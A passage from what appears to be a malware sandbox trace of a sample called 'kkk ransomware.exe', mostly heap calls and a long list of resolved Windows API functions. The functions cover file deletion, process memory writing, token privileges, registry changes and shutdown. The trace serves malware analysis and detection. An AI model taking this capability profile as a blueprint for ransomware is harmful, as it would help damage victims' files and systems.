hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5ee0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcd20 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcfc0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b97a0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b9660 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b8ae0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b93e0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb650 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd1d0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb890 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb570 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b90e0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb850 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcd50 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb9f0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd3e0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb750 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c07f0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b7e60 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0e0 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b8540 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb830 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb910 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd290 | out: hHeap=0x22b349a0000) returned 1 [0097.870] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcdb0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b9120 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd2c0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5420 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb950 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb870 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbab0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcde0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd2f0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb4d0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcea0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbaf0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce70 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbbb0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bea20 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c56a0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349b5f50 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c2ed0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbcb0 | out: hHeap=0x22b349a0000) returned 1 [0097.871] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c16d0 | out: hHeap=0x22b349a0000) returned 1 [0097.872] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a737a0 | out: hHeap=0x22b349a0000) returned 1 [0097.872] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a6b1e0 | out: hHeap=0x22b349a0000) returned 1 [0097.872] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a6d200 | out: hHeap=0x22b349a0000) returned 1 [0097.872] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf30 | out: hHeap=0x22b349a0000) returned 1 Thread: id = 56 os_tid = 0xf38 Thread: id = 59 os_tid = 0x37c Thread: id = 66 os_tid = 0xa48 [0088.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b36a737a0 [0088.586] GetCurrentThreadId () returned 0xa48 Thread: id = 67 os_tid = 0xa44 [0089.822] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b34a6b1e0 [0089.822] GetCurrentThreadId () returned 0xa44 Thread: id = 68 os_tid = 0x13bc [0092.669] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b34a6d200 [0092.669] GetCurrentThreadId () returned 0x13bc Thread: id = 108 os_tid = 0xf14 [0096.305] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b34a685f0 [0096.306] GetCurrentThreadId () returned 0xf14 [0097.849] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a685f0 | out: hHeap=0x22b349a0000) returned 1 Thread: id = 109 os_tid = 0x1164 [0097.114] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b36a7af80 [0097.114] GetCurrentThreadId () returned 0x1164 [0097.848] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7af80 | out: hHeap=0x22b349a0000) returned 1 Process: id = "9" image_name = "kkk ransomware.exe" filename = "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe" page_root = "0xdc22000" os_pid = "0x12b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x19c" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0xf44 [0077.817] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76750000 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="HeapAlloc") returned 0x77892dc0 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="Sleep") returned 0x76766760 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentThreadId") returned 0x76768820 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="RaiseException") returned 0x76765e20 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="MulDiv") returned 0x767be6e0 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="GetVersionExW") returned 0x767656f0 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="GetSystemInfo") returned 0x767654d0 [0077.818] GetProcAddress (hModule=0x76750000, lpProcName="InterlockedIncrement") returned 0x76767420 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="InterlockedDecrement") returned 0x767673c0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="WideCharToMultiByte") returned 0x76766b10 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="lstrcpyW") returned 0x767a7140 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="MultiByteToWideChar") returned 0x76765c40 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="lstrlenW") returned 0x76766c70 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="lstrcmpiW") returned 0x76766bf0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="GetModuleHandleW") returned 0x767650d0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="QueryPerformanceCounter") returned 0x76765da0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="VirtualFreeEx") returned 0x767669f0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="OpenProcess") returned 0x76765cc0 [0077.819] GetProcAddress (hModule=0x76750000, lpProcName="VirtualAllocEx") returned 0x76766990 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="WriteProcessMemory") returned 0x76766b70 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="ReadProcessMemory") returned 0x76765e30 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="CreateFileW") returned 0x767bed10 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="SetFilePointerEx") returned 0x767bf130 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="ReadFile") returned 0x767bf090 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="WriteFile") returned 0x767bf180 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="FlushFileBuffers") returned 0x767bee70 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="TerminateProcess") returned 0x767667e0 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="CreateToolhelp32Snapshot") returned 0x7679edc0 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="Process32FirstW") returned 0x7679f750 [0077.820] GetProcAddress (hModule=0x76750000, lpProcName="Process32NextW") returned 0x7679f8f0 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="SetFileTime") returned 0x767bf140 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="GetFileAttributesW") returned 0x767bef10 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="FindFirstFileW") returned 0x767bedf0 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="FindClose") returned 0x767bed70 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="DeleteFileW") returned 0x767bed40 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="FindNextFileW") returned 0x767bee40 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="MoveFileW") returned 0x7679e500 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="CopyFileW") returned 0x767bf3b0 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="CreateDirectoryW") returned 0x767bece0 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="RemoveDirectoryW") returned 0x767bf0d0 [0077.821] GetProcAddress (hModule=0x76750000, lpProcName="GetProcessHeap") returned 0x767651f0 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="QueryPerformanceFrequency") returned 0x76765dc0 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="FindResourceW") returned 0x76764aa0 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="LoadResource") returned 0x76765b00 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="LockResource") returned 0x76765bc0 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="SizeofResource") returned 0x76766740 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="EnumResourceNamesW") returned 0x767bf1b0 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="OutputDebugStringW") returned 0x76765d10 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="GetLocalTime") returned 0x76765060 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="CompareStringW") returned 0x76764430 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="DeleteCriticalSection") returned 0x7787fb90 [0077.822] GetProcAddress (hModule=0x76750000, lpProcName="EnterCriticalSection") returned 0x7789b2d0 [0077.823] GetProcAddress (hModule=0x76750000, lpProcName="LeaveCriticalSection") returned 0x7789b250 [0077.823] GetProcAddress (hModule=0x76750000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x767bebb0 [0077.823] GetProcAddress (hModule=0x76750000, lpProcName="GetStdHandle") returned 0x76765330 [0077.823] GetProcAddress (hModule=0x76750000, lpProcName="CreatePipe") returned 0x76764590 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="InterlockedExchange") returned 0x767673e0 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="TerminateThread") returned 0x76766800 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="GetTempPathW") returned 0x767beff0 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="GetTempFileNameW") returned 0x767befd0 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="VirtualFree") returned 0x767669d0 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="FormatMessageW") returned 0x76764be0 [0077.825] GetProcAddress (hModule=0x76750000, lpProcName="GetExitCodeProcess") returned 0x76763c60 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="SetErrorMode") returned 0x76766500 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="GetPrivateProfileStringW") returned 0x76798850 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="WritePrivateProfileStringW") returned 0x76798970 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="GetPrivateProfileSectionW") returned 0x767989d0 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="WritePrivateProfileSectionW") returned 0x76798a70 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="GetPrivateProfileSectionNamesW") returned 0x76797d60 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="FileTimeToLocalFileTime") returned 0x767bed60 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="FileTimeToSystemTime") returned 0x767bf1f0 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="SystemTimeToFileTime") returned 0x767667a0 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="LocalFileTimeToFileTime") returned 0x767bf050 [0077.826] GetProcAddress (hModule=0x76750000, lpProcName="GetDriveTypeW") returned 0x767beed0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="GetDiskFreeSpaceExW") returned 0x767beea0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="GetDiskFreeSpaceW") returned 0x767beeb0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="GetVolumeInformationW") returned 0x767bf020 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="SetVolumeLabelW") returned 0x767a36b0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="CreateHardLinkW") returned 0x767644f0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="DeviceIoControl") returned 0x76761170 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="SetFileAttributesW") returned 0x767bf100 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="GetShortPathNameW") returned 0x767910d0 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="CreateEventW") returned 0x767beb30 [0077.827] GetProcAddress (hModule=0x76750000, lpProcName="SetEvent") returned 0x767bec50 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GetEnvironmentVariableW") returned 0x76764fb0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="SetEnvironmentVariableW") returned 0x767664e0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GlobalLock") returned 0x767a42f0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GlobalUnlock") returned 0x767a44e0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GlobalAlloc") returned 0x76765750 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GetFileSize") returned 0x767bef30 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GlobalFree") returned 0x76761ee0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GlobalMemoryStatusEx") returned 0x76765770 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="Beep") returned 0x76760aa0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GetSystemDirectoryW") returned 0x76765490 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GetComputerNameW") returned 0x767932c0 [0077.828] GetProcAddress (hModule=0x76750000, lpProcName="GetWindowsDirectoryW") returned 0x76765730 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentProcessId") returned 0x767bea20 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentThread") returned 0x76768810 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="GetProcessIoCounters") returned 0x767a32c0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="CreateProcessW") returned 0x76764610 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="SetPriorityClass") returned 0x767665c0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="LoadLibraryW") returned 0x76765ae0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="VirtualAlloc") returned 0x76766970 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="LoadLibraryExW") returned 0x76765ac0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="HeapFree") returned 0x767657f0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="WaitForSingleObject") returned 0x767beca0 [0077.829] GetProcAddress (hModule=0x76750000, lpProcName="CreateThread") returned 0x767646b0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="DuplicateHandle") returned 0x767beac0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="GetLastError") returned 0x76765010 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="CloseHandle") returned 0x767beab0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentProcess") returned 0x767bea10 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="GetProcAddress") returned 0x767651b0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="LoadLibraryA") returned 0x76765a80 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="FreeLibrary") returned 0x76764c40 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="GetModuleFileNameW") returned 0x76765090 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="GetFullPathNameW") returned 0x767befa0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="SetCurrentDirectoryW") returned 0x767664a0 [0077.830] GetProcAddress (hModule=0x76750000, lpProcName="IsDebuggerPresent") returned 0x76765930 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentDirectoryW") returned 0x76764e80 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="ExitProcess") returned 0x76763cb0 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="ExitThread") returned 0x778b6390 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetSystemTimeAsFileTime") returned 0x76765530 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="ResumeThread") returned 0x76766380 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetTimeFormatW") returned 0x76767720 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetDateFormatW") returned 0x76767740 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetCommandLineW") returned 0x76764cc0 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="GetStartupInfoW") returned 0x76765320 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="IsProcessorFeaturePresent") returned 0x76765960 [0077.831] GetProcAddress (hModule=0x76750000, lpProcName="HeapSize") returned 0x778aa790 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="GetCPInfo") returned 0x76764d10 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="GetACP") returned 0x76764ca0 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="GetOEMCP") returned 0x76765160 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="IsValidCodePage") returned 0x767659c0 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="TlsAlloc") returned 0x76766820 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="TlsGetValue") returned 0x76766850 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="TlsSetValue") returned 0x76766870 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="TlsFree") returned 0x76766830 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="SetLastError") returned 0x76764f00 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="UnhandledExceptionFilter") returned 0x767668d0 [0077.832] GetProcAddress (hModule=0x76750000, lpProcName="SetUnhandledExceptionFilter") returned 0x76766720 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="GetStringTypeW") returned 0x767653b0 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="HeapCreate") returned 0x767657b0 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="SetHandleCount") returned 0x76761150 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="GetFileType") returned 0x767bef60 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="SetStdHandle") returned 0x76766620 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="GetConsoleCP") returned 0x767bf440 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="GetConsoleMode") returned 0x767bf450 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="LCMapStringW") returned 0x76765a60 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="RtlUnwind") returned 0x76767c10 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="SetFilePointer") returned 0x767bf120 [0077.833] GetProcAddress (hModule=0x76750000, lpProcName="GetTimeZoneInformation") returned 0x76765650 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="FreeEnvironmentStringsW") returned 0x76764c20 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="GetEnvironmentStringsW") returned 0x76764eb0 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="GetTickCount") returned 0x767bdd50 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="HeapReAlloc") returned 0x7788f630 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="WriteConsoleW") returned 0x767bf500 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="SetEndOfFile") returned 0x767bf0e0 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="SetSystemPowerState") returned 0x76762890 [0077.834] GetProcAddress (hModule=0x76750000, lpProcName="SetEnvironmentVariableA") returned 0x767664c0 [0077.834] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76390000 [0077.834] GetProcAddress (hModule=0x76390000, lpProcName="RegEnumValueW") returned 0x763af250 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegDeleteValueW") returned 0x763b0580 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegDeleteKeyW") returned 0x763af910 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegEnumKeyExW") returned 0x763aefd0 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegSetValueExW") returned 0x763af530 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegCreateKeyExW") returned 0x763af4f0 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="GetUserNameW") returned 0x763af890 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="RegConnectRegistryW") returned 0x763b3910 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="CloseServiceHandle") returned 0x763afc00 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="UnlockServiceDatabase") returned 0x763d46c0 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="OpenThreadToken") returned 0x763aeeb0 [0077.835] GetProcAddress (hModule=0x76390000, lpProcName="OpenProcessToken") returned 0x763aefb0 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="LookupPrivilegeValueW") returned 0x763a8c80 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="DuplicateTokenEx") returned 0x763b0370 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="CreateProcessAsUserW") returned 0x763b0690 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="CreateProcessWithLogonW") returned 0x763d6980 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="InitializeSecurityDescriptor") returned 0x763af870 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="InitializeAcl") returned 0x763af850 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="GetLengthSid") returned 0x763af1b0 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="CopySid") returned 0x763af360 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="LogonUserW") returned 0x763b2a80 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="LockServiceDatabase") returned 0x763d44c0 [0077.836] GetProcAddress (hModule=0x76390000, lpProcName="GetTokenInformation") returned 0x763aee90 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="GetSecurityDescriptorDacl") returned 0x763af830 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="GetAclInformation") returned 0x763c3090 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="GetAce") returned 0x763c3070 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="AddAce") returned 0x763c23b0 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="SetSecurityDescriptorDacl") returned 0x763af6c0 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="RegOpenKeyExW") returned 0x763ae580 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="RegQueryValueExW") returned 0x763ae5a0 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="AdjustTokenPrivileges") returned 0x763affa0 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="InitiateSystemShutdownExW") returned 0x763d3d70 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="OpenSCManagerW") returned 0x763b0540 [0077.837] GetProcAddress (hModule=0x76390000, lpProcName="RegCloseKey") returned 0x763aed60 [0077.837] LoadLibraryA (lpLibFileName="COMCTL32.dll") returned 0x73fb0000 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_Remove") returned 0x7402ed30 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_SetDragCursorImage") returned 0x7407ab80 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_BeginDrag") returned 0x7407a2b0 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_DragEnter") returned 0x7407a500 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_DragLeave") returned 0x7407a570 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_EndDrag") returned 0x7407a740 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_DragMove") returned 0x7407a5e0 [0077.838] GetProcAddress 